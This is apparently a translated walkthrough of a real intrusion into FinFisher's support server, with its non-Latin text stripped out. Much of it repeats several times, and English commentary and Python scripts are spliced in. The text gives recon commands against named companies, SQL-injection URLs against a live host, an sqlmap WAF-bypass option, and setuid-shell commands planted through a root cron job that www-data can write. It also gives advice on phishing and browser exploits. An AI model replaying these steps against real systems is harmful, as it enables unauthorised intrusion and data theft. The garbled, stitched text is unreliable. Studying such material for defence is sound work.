C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
( )
___________ < got r00t? > ----------- \ ^__^ \ (oo)\_______ (__)\ )\/\ ||----w | || || ^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/ http://overthewire.org/wargames/ http://www.hackthissite.org/ http://smashthestack.org/ http://www.win.tue.nl/~aeb/linux/hh/hh.html http://www.phrack.com/ http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/ https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( ) https://www.corelan.be/ ( Exploit writing tutorial part 1) http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/ http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook Hacking: The Art of Exploitation The Database Hacker's Handbook The Art of Software Security Assessment A Bug Hunter's Diary Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier TCP/IP Illustrated
C:\Documents and Settings\\Local Settings\Temp\ - . Dynamic forking (Process hollowing), , . ( , ). MBR . C:\Windows\Installer\{49FD463C-18F1-63C4-8F12-49F518F127}
, , , ( -), Skype . IP ( 77.69.140.194) 22, 53, 80, 443, 4111 ( - ).
:
40 Skype (, , , , ) (email, , VoIP) - (Windows, Mac OSX Linux)
, FinFisher . , , .
. , - -. .
.
, - - , :
Truecrypt 7.1a . Whonix . Debian, Tor. , Whonix Tor, - , -. aircrack-ng reaver, cantenna.
Whonix, - , , , - . - .
: , Tor. , -, - nmap, sqlmap nikto, , Tor . VPS. Tor , , , .
fierce , whois- IP- .
Blackwater. - (academi.com). :
fierce.pl -dns academi.com 67.238.84.228 email.academi.com 67.238.84.242 extranet.academi.com 67.238.84.240 mail.academi.com 67.238.84.230 secure.academi.com 67.238.84.227 vault.academi.com 54.243.51.249 www.academi.com
whois- www.academi.com
, Amazon Web Service.
NetRange: 67.238.84.224 - 67.238.84.255 CIDR: 67.238.84.224/27 CustName: Blackwater USA Address: 850 Puddin Ridge Rd
whois- academi.com
, ( 850 Puddin Ridge Rd ), whois-. , , Google:
"850 Puddin Ridge Rd" inurl:ip-address-lookup "850 Puddin Ridge Rd" inurl:domaintools
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com 67.132.195.12 academiproshop.com 67.238.84.236 te.academi.com 67.238.84.238 property.academi.com 67.238.84.241 teams.academi.com
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1 https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
IP-, fierce.pl
, fierce.pl -dns
- IP-. , , .
Google . , academi.com
, - :
54.236.143.203 careers.academi.com
67.132.195.12 academiproshop.com
67.238.84.236 te.academi.com
67.238.84.238 property.academi.com
67.238.84.241 teams.academi.com
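The hosts that fierce and the Google dorks turned up are only useful once they are grouped into netblocks: one whois lookup per block tells you whether the block is the company's own, and the addresses in that block without a hostname are what DNS enumeration missed. The script below is an added example and is not code from the original guide; FIERCE_OUTPUT is a hand-assembled sample in fierce's "IP hostname" layout built from the hosts listed on this page, and the function names are the example's own.

```python
"""Turn discovered hosts into netblocks to whois and scan. Constructed example:
FIERCE_OUTPUT is assembled by hand in fierce's "IP hostname" layout from the
hosts listed on this page; the function names are not from the original guide."""
import ipaddress
from collections import defaultdict

FIERCE_OUTPUT = """\
67.238.84.228 email.academi.com
67.238.84.242 extranet.academi.com
67.238.84.240 mail.academi.com
67.238.84.230 secure.academi.com
67.238.84.227 vault.academi.com
54.243.51.249 www.academi.com
54.236.143.203 careers.academi.com
67.132.195.12 academiproshop.com
67.238.84.236 te.academi.com
67.238.84.238 property.academi.com
67.238.84.241 teams.academi.com
"""


def parse_hosts(text):
    """Map hostname -> IPv4Address for every 'IP hostname' line; other lines are skipped."""
    hosts = {}
    for line in text.splitlines():
        parts = line.split()
        if len(parts) < 2:
            continue
        try:
            hosts[parts[1].rstrip(".").lower()] = ipaddress.ip_address(parts[0])
        except ValueError:
            continue  # fierce prints headers and notes between the results
    return hosts


def group_by_prefix(hosts, prefixlen=24):
    """Bucket hosts into /prefixlen networks: each bucket is one whois lookup and one scan range."""
    groups = defaultdict(list)
    for name, ip in hosts.items():
        groups[ipaddress.ip_network(f"{ip}/{prefixlen}", strict=False)].append(name)
    return {net: sorted(names) for net, names in sorted(groups.items())}


def hosts_in_netblock(hosts, cidr):
    """Hosts inside a block that whois assigns to the target (e.g. the /27 quoted on this page)."""
    net = ipaddress.ip_network(cidr)
    return sorted(name for name, ip in hosts.items() if ip in net)


def unnamed_addresses(hosts, cidr):
    """Addresses in the assigned block with no hostname yet: the part DNS enumeration missed."""
    net = ipaddress.ip_network(cidr)
    known = set(hosts.values())
    return [str(ip) for ip in net.hosts() if ip not in known]


if __name__ == "__main__":
    found = parse_hosts(FIERCE_OUTPUT)
    for net, names in group_by_prefix(found).items():
        print(net, names)
    # The whois record on this page gives 67.238.84.224/27 as the company's block.
    print(unnamed_addresses(found, "67.238.84.224/27"))
```

Feed it the real fierce output and the CIDR from the whois record; the addresses it returns are the ones to reverse-resolve and port-scan before trusting the hostname list as complete.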
whois- , academiproshop.com
, .
FinFisher finsupport.finfisher.com
whois- finfisher.com
, " FinFisher GmbH ". "FinFisher GmbH" inurl:domaintools
gamma-international.de
, finsupport.finfisher.com
.
, . , , , , .
nmap- IP- . SNMP-.
:
-, ? , , , URL IP . fierce
git-, git.companyname.come/gitweb/
. ? , FTP-, . . (VOIP-, IP-, ...) . ?
- . , , nmap , :
-. fierce
, , test.company.com
dev.company.com
, . nikto . webserver/.svn/
, webserver/backup/
, webserver/phpinfo.php
. , . WhatWeb . , wpscan , CMS-Explorer Joomscan . , . , . - - , , . ZAP . . , . , . , , ( ), Google , .
finsupport.finfisher.com
:
nikto
. . . SQL-. WhatWeb . WhatWeb , , , - , Gamma , ? , URL, ( index.php
, , ). Scripts/scripts.js.php
Google: allinurl:"Scripts/scripts.js.php"
, , , -. , , . .
, - : " , - , Gamma Group... "
, , , . :
Google: allinurl:"Scripts/scripts.js.php"
, SQL- , . , - Apache ModSecurity , sqlmap --tamper='tamper/modsecurityversioned.py'
, , PHP- ( JavaScript-) -.
, , .
. : , LFI, JavaScript-, - Location, .
finsupport . /BackOffice/
403 Forbidden , SQL- ( ). print.php
,
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 1=1
https://finsupport.finfisher.com/GGI/Home/print.php?id=1 and 2=1
, print.php
, . ! MySQL . , magicquotes
, MySQL- INTO OUTFILE
. , sqlmap --file-read
PHP- URL -, HTML-, PHP- HTML-, .
, , , . , .
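The two print.php requests above are the classic boolean differential: a true tautology must reproduce the normal page and a false one must change it. Because the injection point is a bare number, no quote character is ever needed, which is why magic_quotes changes nothing here; it only bites when a quoted string is required, as with the file path of INTO OUTFILE, while LOAD_FILE() can take a hex literal, which is how sqlmap's --file-read gets around it. The script below is an added example, not code from the original guide or from Gamma's application: it runs the probe against an in-memory SQLite stand-in with a constructed table, and shows the concatenated query next to the parameterised fix. Table, rows and function names are the example's own.

```python
"""Boolean-based SQL injection probe for a numeric parameter, with the vulnerable
and the hardened query side by side. Constructed example: the table, rows and
function names are not from the original guide or the target application."""
import sqlite3


def make_db():
    """In-memory stand-in (constructed) for the table behind a page like print.php?id=N."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        "CREATE TABLE docs(id INTEGER PRIMARY KEY, title TEXT);"
        "INSERT INTO docs VALUES (1, 'Release notes'), (2, 'Licence terms');"
    )
    return conn


def magic_quotes(value):
    """Mimic PHP's magic_quotes_gpc: backslash-escape quotes and backslashes.
    A numeric injection never needs a quote character, so this changes nothing."""
    return value.replace("\\", "\\\\").replace("'", "\\'").replace('"', '\\"')


def vulnerable_print(conn, id_param):
    """The 'before' version: the id parameter is concatenated straight into the SQL."""
    sql = "SELECT title FROM docs WHERE id=" + magic_quotes(id_param)
    try:
        row = conn.execute(sql).fetchone()
    except sqlite3.Error:
        return None  # the page would show an error or an empty body
    return row[0] if row else None


def hardened_print(conn, id_param):
    """The fix: reject anything that is not an integer, then bind the value."""
    if not id_param.isdigit():
        return None
    row = conn.execute("SELECT title FROM docs WHERE id=?", (int(id_param),)).fetchone()
    return row[0] if row else None


def probe_boolean_sqli(page, base_value="1"):
    """True when a true tautology reproduces the baseline response and a false one
    changes it: the differential behind 'id=1 and 1=1' versus 'id=1 and 2=1'."""
    baseline = page(base_value)
    if baseline is None:
        return False
    true_probe = page(f"{base_value} and 1=1")
    false_probe = page(f"{base_value} and 2=1")
    return true_probe == baseline and false_probe != baseline


def run_probe_demo():
    """Probe both versions of the page; returns (vulnerable_detected, hardened_detected)."""
    conn = make_db()
    vulnerable = probe_boolean_sqli(lambda v: vulnerable_print(conn, v))
    hardened = probe_boolean_sqli(lambda v: hardened_print(conn, v))
    return vulnerable, hardened


if __name__ == "__main__":
    print(run_probe_demo())  # (True, False)
```

Against a live target the `page` callable would be an HTTP fetch that returns the response body; comparing bodies rather than status codes is what keeps the check working when the application answers 200 to everything.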
( )
 ___________
< got r00t? >
 -----------
        \   ^__^
         \  (oo)\_______
            (__)\       )\/\
                ||----w |
                ||     ||
^^^^^^^^^^^^^^^^
root 50% Linux- : Linux_Exploit_Suggester unix-privesc-check .
finsupport
Debian, , unix-privesc-check
:
WARNING: /etc/cron.hourly/mgmtlicensestatus is run by cron as root. The user www-data can write to /etc/cron.hourly/mgmtlicensestatus
WARNING: /etc/cron.hourly/webalizer is run by cron as root. The user www-data can write to /etc/cron.hourly/webalizer
/etc/cron.hourly/webalizer :
chown root:root /path/to/my_setuid_shell
chmod 04755 /path/to/my_setuid_shell
, ... . , cron
. webalizer
, , . , cron
, , cron
. ls -l /etc/localtime
, 6- , webalizer
, , , . , , , - , , . Root- , .
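The two unix-privesc-check warnings above describe one misconfiguration: a file that root's cron executes is writable by the web server account, so whoever owns the web shell owns the box at the next run. The audit below is an added example, not code from the original guide or from unix-privesc-check itself. It reproduces the ownership and mode check behind those warnings for a chosen uid and group set, treats a writable directory as equally fatal (the job file can simply be replaced), and builds a throwaway cron.hourly lookalike with made-up file names to audit; the remediation on a real system is `chown root:root` and `chmod 0755` on every job file, and the same for the directory.

```python
"""Audit cron job directories for files a low-privilege account can modify, the
condition behind unix-privesc-check's 'The user www-data can write to ...' warnings.
Constructed example: the fixture directory and file names are made up for the demo;
nothing here is the original guide's code or unix-privesc-check's."""
import os
import stat
import tempfile

# Debian-style locations where a root cron job is a file rather than a crontab line.
CRON_DIRS = ["/etc/cron.hourly", "/etc/cron.daily", "/etc/cron.weekly",
             "/etc/cron.monthly", "/etc/cron.d"]


def writable_by(st, uid, gids):
    """Reason a principal (uid, set of gids) could write a file with these stat
    results, or None. Mirrors the kernel's owner/group/other check; ACLs are ignored."""
    mode = st.st_mode
    if st.st_uid == uid and mode & stat.S_IWUSR:
        return "owned by the user and owner-writable"
    if st.st_gid in gids and mode & stat.S_IWGRP:
        return "group-writable by one of the user's groups"
    if mode & stat.S_IWOTH:
        return "world-writable"
    return None


def writable_cron_jobs(uid, gids, cron_dirs=CRON_DIRS):
    """Return [(path, reason)] for every cron directory or job file the principal can write."""
    findings = []
    for directory in cron_dirs:
        if not os.path.isdir(directory):
            continue
        # A writable directory is as bad as a writable script: the job file can be replaced.
        reason = writable_by(os.stat(directory), uid, gids)
        if reason:
            findings.append((directory, "directory " + reason))
        for name in sorted(os.listdir(directory)):
            path = os.path.join(directory, name)
            reason = writable_by(os.stat(path), uid, gids)  # os.stat follows symlinks to the real target
            if reason:
                findings.append((path, reason))
    return findings


def run_demo():
    """Build a throwaway cron.hourly lookalike and audit it as an account that owns
    nothing in it, the position www-data is in on a root-owned /etc."""
    root = tempfile.mkdtemp()
    hourly = os.path.join(root, "cron.hourly")
    os.mkdir(hourly)
    os.chmod(hourly, 0o755)
    # (name, mode): two misconfigured jobs and one correct one, modelled on the warnings above
    for name, mode in (("webalizer", 0o777), ("mgmtlicensestatus", 0o766), ("logrotate", 0o755)):
        path = os.path.join(hourly, name)
        with open(path, "w") as fh:
            fh.write("#!/bin/sh\n")
        os.chmod(path, mode)
    other_uid = os.getuid() + 1  # not the owner of anything created above
    return sorted(os.path.basename(p) for p, _ in writable_cron_jobs(other_uid, set(), [hourly]))


if __name__ == "__main__":
    for path, reason in writable_cron_jobs(os.getuid(), set(os.getgroups())):
        print(f"WARNING: {path} is {reason}")
    print(run_demo())  # ['mgmtlicensestatus', 'webalizer']
```

Run as the web server account (or pass its uid and the gids from `id www-data`) on the real directories to get the same picture the attacker had; an empty result for that account is the state to keep.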
, . , , . nmap
. nse- nfs-*
smb-*
. finsupport - -, qateam
, .
, . . . :
Gamma FinSpy FinSpy C&C , C&C - , , C&C - FinFisher C&C - DDoS- Gamma Group .
Gamma , , FinSpy , , , , Twitter-.
: , GPU FinSpy-PC+Mobile-2012-07-12-Final.zip (magnet-, 38,7 ) , !
, , , . , .
1) -, Java , Flash Microsoft Office email-, . , / Java / Flash .
, , , 0day- FinSploit VUPEN , . -, . Metasploit-browser autopwn -, , , , Flash -.
2) , 95% , . : " ". , , , .
40 . , PGP- , . GitHub, : https://github.com/FinFisher .
:
Hacker News Reddit
https://www.pentesterlab.com/exercises/
http://overthewire.org/wargames/
http://www.hackthissite.org/
http://smashthestack.org/
http://www.win.tue.nl/~aeb/linux/hh/hh.html
http://www.phrack.com/
http://pen-testing.sans.org/blog/2012/04/26/got-meterpreter-pivot
http://www.offensive-security.com/metasploit-unleashed/PSExec_Pass_The_Hash
https://securusglobal.com/community/2013/12/20/dumping-windows-credentials/
https://www.netspi.com/blog/entryid/140/resources-for-aspiring-penetration-testers ( )
https://www.corelan.be/ ( Exploit writing tutorial part 1)
http://websec.wordpress.com/2010/02/22/exploiting-php-file-inclusion-overview/
http://www.dest-unreach.org/socat/
:
The Web Application Hacker's Handbook
Hacking: The Art of Exploitation
The Database Hacker's Handbook
The Art of Software Security Assessment
A Bug Hunter's Diary
Underground: Tales of Hacking, Madness, and Obsession on the Electronic Frontier
TCP/IP Illustrated
